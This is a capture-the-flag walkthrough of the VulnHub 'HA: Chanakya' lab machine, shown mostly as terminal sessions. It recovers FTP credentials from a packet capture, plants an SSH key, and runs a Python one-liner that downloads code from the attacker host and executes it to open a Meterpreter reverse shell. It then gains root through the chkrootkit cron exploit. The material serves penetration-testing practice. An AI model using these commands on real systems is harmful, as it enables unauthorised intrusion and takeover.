HA_CHANAKYA-(VULNHUB)

Report Link: http://download.vulnhub.com/ha/chanakya.zip

root@kali:~/Downloads# nmap -A 192.168.135.132
Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-30 17:12 GMT
Nmap scan report for 192.168.135.132
Host is up (0.00039s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp pyftpdlib 1.0.0 or later
| ftp-syst:
| STAT:
| FTP server status:
| Connected to: 192.168.135.132:21
| Waiting for username.
| TYPE: ASCII; STRUcture: File; MODE: Stream
| Data connection closed.
|_End of status.
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 fd:4b:52:55:c2:41:5f:51:a4:5d:90:5b:be:17:0d:13 (RSA)
| 256 f1:98:34:0a:43:97:6d:c7:e0:78:d3:23:e0:4e:18:11 (ECDSA)
|_ 256 9d:eb:79:af:59:c0:bb:c2:4a:e3:00:7c:05:62:48:30 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: HA: Chanakya
MAC Address: 00:0C:29:BB:CA:D3 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 – 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT ADDRESS
1 0.39 ms 192.168.135.132

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.11 seconds

on browser

http://192.168.135.132/

root@kali:~/Downloads# dirb http://192.168.135.132/ -X .txt

—————–
DIRB v2.22
By The Dark Raver
—————–

START_TIME: Sat Nov 30 17:17:25 2019
URL_BASE: http://192.168.135.132/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
EXTENSIONS_LIST: (.txt) | (.txt) [NUM = 1]

—————–

GENERATED WORDS: 4612

—- Scanning URL: http://192.168.135.132/ —-
+ http://192.168.135.132/abuse.txt (CODE:200|SIZE:14)

—————–
END_TIME: Sat Nov 30 17:17:30 2019
DOWNLOADED: 4612 – FOUND: 1

root@kali:~/Downloads# wget http://192.168.135.132/abuse.txt
–2019-11-30 17:18:09– http://192.168.135.132/abuse.txt
Connecting to 192.168.135.132:80… connected.
HTTP request sent, awaiting response… 200 OK
Length: 14 [text/plain]
Saving to: ‘abuse.txt’

abuse.txt 100%[===================================================================>] 14 –.-KB/s in 0s

2019-11-30 17:18:09 (3.12 MB/s) – ‘abuse.txt’ saved [14/14]

root@kali:~/Downloads# cat abuse.txt
nfubxn.cpncat

https://rot13.com/

nfubxn.cpncat

output : ashoka.pcapng

oot@kali:~/Downloads# wget http://192.168.135.132/ashoka.pcapng
–2019-11-30 17:19:51– http://192.168.135.132/ashoka.pcapng
Connecting to 192.168.135.132:80… connected.
HTTP request sent, awaiting response… 200 OK
Length: 101900 (100K)
Saving to: ‘ashoka.pcapng’

ashoka.pcapng 100%[===================================================================>] 99.51K –.-KB/s in 0.001s

2019-11-30 17:19:51 (118 MB/s) – ‘ashoka.pcapng’ saved [101900/101900]

root@kali:~/Downloads# wireshark ashoka.pcapng

filter : tcp.stream eq 1

select -> tcp stream

we get

USER ashoka
331 Username ok, send password.
PASS kautilya

root@kali:~/Downloads# ftp 192.168.135.132
Connected to 192.168.135.132.
220 pyftpdlib based ftpd ready.
Name (192.168.135.132:root): ashoka
331 Username ok, send password.
Password: kautilya
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -la
200 Active data connection established.
125 Data connection already open. Transfer starting.
-rw——- 1 ashoka ashoka 1 Nov 05 15:57 .bash_history
-rw-r–r– 1 ashoka ashoka 220 Nov 05 14:05 .bash_logout
-rw-r–r– 1 ashoka ashoka 3771 Nov 05 14:05 .bashrc
drwx—— 2 ashoka ashoka 4096 Nov 05 14:18 .cache
drwxrwxr-x 3 ashoka ashoka 4096 Nov 05 14:26 .local
-rw-r–r– 1 ashoka ashoka 807 Nov 05 14:05 .profile
226 Transfer complete.
ftp> mkdir .ssh
257 “/.ssh” directory created.
ftp> cd .ssh
250 “/.ssh” is the current directory.

root@kali:~/Downloads# ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa):
/root/.ssh/id_rsa already exists.
Overwrite (y/n)? y
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /root/.ssh/id_rsa.
Your public key has been saved in /root/.ssh/id_rsa.pub.
The key fingerprint is:
SHA256:pfrXft26I5ghrvy29SCC6uMPVr3j0OMYHYMw0x9mz5g root@kali
The key’s randomart image is:
+—[RSA 3072]—-+
| |
| . |
| + . + . |
| + * * o |
| o E S |
| . + =. . |
| o + O…o= ..|
| ..o B =oo+oo o o|
| o+oo =++o .ooo+ |
+—-[SHA256]—–+

root@kali:~/Downloads# cd ~/.ssh

root@kali:~/.ssh# ls
id_rsa IMG_0545.JPG IMG_0547.JPG IMG_0552.JPG known_hosts MyPasswords.kdbx.john uzumaki.txt
id_rsa.pub IMG_0546.JPG IMG_0548.JPG IMG_0553.JPG MyPasswords.kdbx MyPasswords.kdbx.lock

root@kali:~/.ssh# cat id_rsa.pub > authorized_keys

root@kali:~/.ssh# ls
authorized_keys id_rsa.pub IMG_0546.JPG IMG_0548.JPG IMG_0553.JPG MyPasswords.kdbx MyPasswords.kdbx.lock
id_rsa IMG_0545.JPG IMG_0547.JPG IMG_0552.JPG known_hosts MyPasswords.kdbx.john uzumaki.txt

root@kali:~/.ssh# cp authorized_keys /root/Downloads/

back to ftp session

ftp> put authorized_keys
local: authorized_keys remote: authorized_keys
local: authorized_keys: No such file or directory
ftp> put authorized_keys
local: authorized_keys remote: authorized_keys
200 Active data connection established.
125 Data connection already open. Transfer starting.
226 Transfer complete.
563 bytes sent in 0.00 secs (8.5225 MB/s)
ftp> ls
200 Active data connection established.
125 Data connection already open. Transfer starting.
-rw-r–r– 1 root root 563 Nov 30 17:26 authorized_keys
226 Transfer complete.

root@kali:~/.ssh# ssh ashoka@192.168.135.132
The authenticity of host ‘192.168.135.132 (192.168.135.132)’ can’t be established.
ECDSA key fingerprint is SHA256:cuEf1JsbferQL5tQ/iVC9mGMCIALDE5/sX/OJt5LgPQ.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added ‘192.168.135.132’ (ECDSA) to the list of known hosts.
Welcome to Ubuntu 18.04 LTS (GNU/Linux 4.15.0-20-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

* Canonical Livepatch is available for installation.
– Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch
Last login: Tue Nov 5 06:36:00 2019 from 192.168.1.107
ashoka@ubuntu:~$ ls /tmp
logs
systemd-private-c670d3f7fd934484a136a99270d2ddc6-apache2.service-O5mjMK
systemd-private-c670d3f7fd934484a136a99270d2ddc6-systemd-resolved.service-usRaRU
systemd-private-c670d3f7fd934484a136a99270d2ddc6-systemd-timesyncd.service-AfrL85
VMwareDnD
vmware-root_418-600543236
ashoka@ubuntu:~$ cat logs
cat: logs: No such file or directory
ashoka@ubuntu:~$ cat /tmp/logs
ROOTDIR is `/’
Checking `amd’… not found
Checking `basename’… not infected
Checking `biff’… not found
Checking `chfn’… not infected
Checking `chsh’… not infected
Checking `cron’… not infected
Checking `crontab’… not infected
Checking `date’… not infected
Checking `du’… not infected
Checking `dirname’… not infected
Checking `echo’… not infected
Checking `egrep’… not infected
Checking `env’… not infected
Checking `find’… not infected
Checking `fingerd’… not found
Checking `gpm’… not found
Checking `grep’… not infected
Checking `hdparm’… not infected
Checking `su’… not infected
Checking `ifconfig’… not infected
Checking `inetd’… not tested
Checking `inetdconf’… not found
Checking `identd’… not found
Checking `init’… not infected
Checking `killall’… not infected
Checking `ldsopreload’… can’t exec ./strings-static, not tested
Checking `login’… not infected
Checking `ls’… not infected
Checking `lsof’… not infected
Checking `mail’… not found
Checking `mingetty’… not found
Checking `netstat’… not infected
Checking `named’… not found
Checking `passwd’… not infected
Checking `pidof’… not infected
Checking `pop2’… not found
Checking `pop3’… not found
Checking `ps’… not infected
Checking `pstree’… not infected
Checking `rpcinfo’… not found
Checking `rlogind’… not found
Checking `rshd’… not found
Checking `slogin’… not infected
Checking `sendmail’… not found
Checking `sshd’… not infected
Checking `syslogd’… not tested
Checking `tar’… not infected
Checking `tcpd’… INFECTED
Checking `tcpdump’… not infected
Checking `top’… not infected
Checking `telnetd’… not found
Checking `timed’… not found
Checking `traceroute’… not found
Checking `vdir’… not infected
Checking `w’… not infected
Checking `write’… not infected
Checking `aliens’… no suspect files
Searching for sniffer’s logs, it may take a while… nothing found
Searching for HiDrootkit’s default dir… nothing found
Searching for t0rn’s default files and dirs… nothing found
Searching for t0rn’s v8 defaults… nothing found
Searching for Lion Worm default files and dirs… nothing found
Searching for RSHA’s default files and dir… nothing found
Searching for RH-Sharpe’s default files… nothing found
Searching for Ambient’s rootkit (ark) default files and dirs… nothing found
Searching for suspicious files and dirs, it may take a while…
/lib/modules/4.15.0-20-generic/vdso/.build-id
/lib/modules/4.15.0-20-generic/vdso/.build-id
Searching for LPD Worm files and dirs… nothing found
Searching for Ramen Worm files and dirs… nothing found
Searching for Maniac files and dirs… nothing found
Searching for RK17 files and dirs… nothing found
Searching for Ducoci rootkit… nothing found
Searching for Adore Worm… nothing found
Searching for ShitC Worm… nothing found
Searching for Omega Worm… nothing found
Searching for Sadmind/IIS Worm… nothing found
Searching for MonKit… nothing found
Searching for Showtee… nothing found
Searching for OpticKit… nothing found
Searching for T.R.K… nothing found
Searching for Mithra… nothing found
Searching for LOC rootkit… nothing found
Searching for Romanian rootkit… nothing found
Searching for Suckit rootkit… Warning: /sbin/init INFECTED
Searching for Volc rootkit… nothing found
Searching for Gold2 rootkit… nothing found
Searching for TC2 Worm default files and dirs… nothing found
Searching for Anonoying rootkit default files and dirs… nothing found
Searching for ZK rootkit default files and dirs… nothing found
Searching for ShKit rootkit default files and dirs… nothing found
Searching for AjaKit rootkit default files and dirs… nothing found
Searching for zaRwT rootkit default files and dirs… nothing found
Searching for Madalin rootkit default files… nothing found
Searching for Fu rootkit default files… nothing found
Searching for ESRK rootkit default files… nothing found
Searching for rootedoor… nothing found
Searching for ENYELKM rootkit default files… nothing found
Searching for common ssh-scanners default files… nothing found
Searching for suspect PHP files… nothing found
Searching for anomalies in shell history files… nothing found
Checking `asp’… not infected
Checking `bindshell’… not infected
Checking `lkm’… not tested: can’t exec
Checking `rexedcs’… not found
Checking `sniffer’… not tested: can’t exec ./ifpromisc
Checking `w55808’… not infected
Checking `wted’… not tested: can’t exec ./chkwtmp
Checking `scalper’… not infected
Checking `slapper’… not infected
Checking `z2’… not tested: can’t exec ./chklastlog
Checking `chkutmp’… not tested: can’t exec ./chkutmp
Checking `OSX_RSPLUG’… not infected

on another terminal

msf5 > use exploit/multi/script/web_delivery
msf5 exploit(multi/script/web_delivery) > set LHOST 192.168.135.128
LHOST => 192.168.135.128
msf5 exploit(multi/script/web_delivery) > exploit
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 192.168.135.128:4444
[*] Using URL: http://0.0.0.0:8080/8MrSwDDPA4kwR8
[*] Local IP: http://192.168.135.128:8080/8MrSwDDPA4kwR8
[*] Server started.
[*] Run the following command on the target machine:
python -c “import sys;u=__import__(‘urllib’+{2:”,3:’.request’}[sys.version_info[0]],fromlist=(‘urlopen’,));r=u.urlopen(‘http://192.168.135.128:8080/8MrSwDDPA4kwR8’);exec(r.read());”

ashoka@ubuntu:~$ python -c “import sys;u=__import__(‘urllib’+{2:”,3:’.request’}[sys.version_info[0]],fromlist=(‘urlopen’,));r=u.urlopen(‘http://192.168.135.128:8080/8MrSwDDPA4kwR8’);exec(r.read());”

now on msf session we get the meterpreter session

msf5 exploit(multi/script/web_delivery) > [*] 192.168.135.132 web_delivery – Delivering Payload (454) bytes
[*] Sending stage (53755 bytes) to 192.168.135.132
[*] Meterpreter session 1 opened (192.168.135.128:4444 -> 192.168.135.132:60582) at 2019-11-30 17:30:16 +0000

msf5 exploit(multi/script/web_delivery) > use exploit/unix/local/chkrootkit
msf5 exploit(unix/local/chkrootkit) > set session 1
session => 1
msf5 exploit(unix/local/chkrootkit) > set LPORT 8888
LPORT => 8888
msf5 exploit(unix/local/chkrootkit) > exploit

[*] Started reverse TCP double handler on 192.168.135.128:8888
[!] Rooting depends on the crontab (this could take a while)
[*] Payload written to /tmp/update
[*] Waiting for chkrootkit to run via cron…
[*] Accepted the first client connection…
[*] Accepted the second client connection…
[*] Command: echo 3MUfKmBnNryvzj3a;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets…
[*] Reading from socket B
[*] B: “3MUfKmBnNryvzj3a\r\n”
[*] Matching…
[*] A is input…
[*] Command shell session 2 opened (192.168.135.128:8888 -> 192.168.135.132:45516) at 2019-11-30 17:32:03 +0000
[+] Deleted /tmp/update

python -c ‘import pty;pty.spawn(“/bin/bash”)’
root@ubuntu:~# ls
ls
final.txt
root@ubuntu:~# cat final.txt
cat final.txt

!! Congrats you have finished this task !!

Contact us here:

Hacking Articles : https://twitter.com/rajchandel/
Geet Madan : https://in.linkedin.com/in/geet-madan

+-+-+-+-+-+ +-+-+-+-+-+-+-+
|E|n|j|o|y| |H|A|C|K|I|N|G|
+-+-+-+-+-+ +-+-+-+-+-+-+-+
____________________________________

@SAKSHAM DIXIT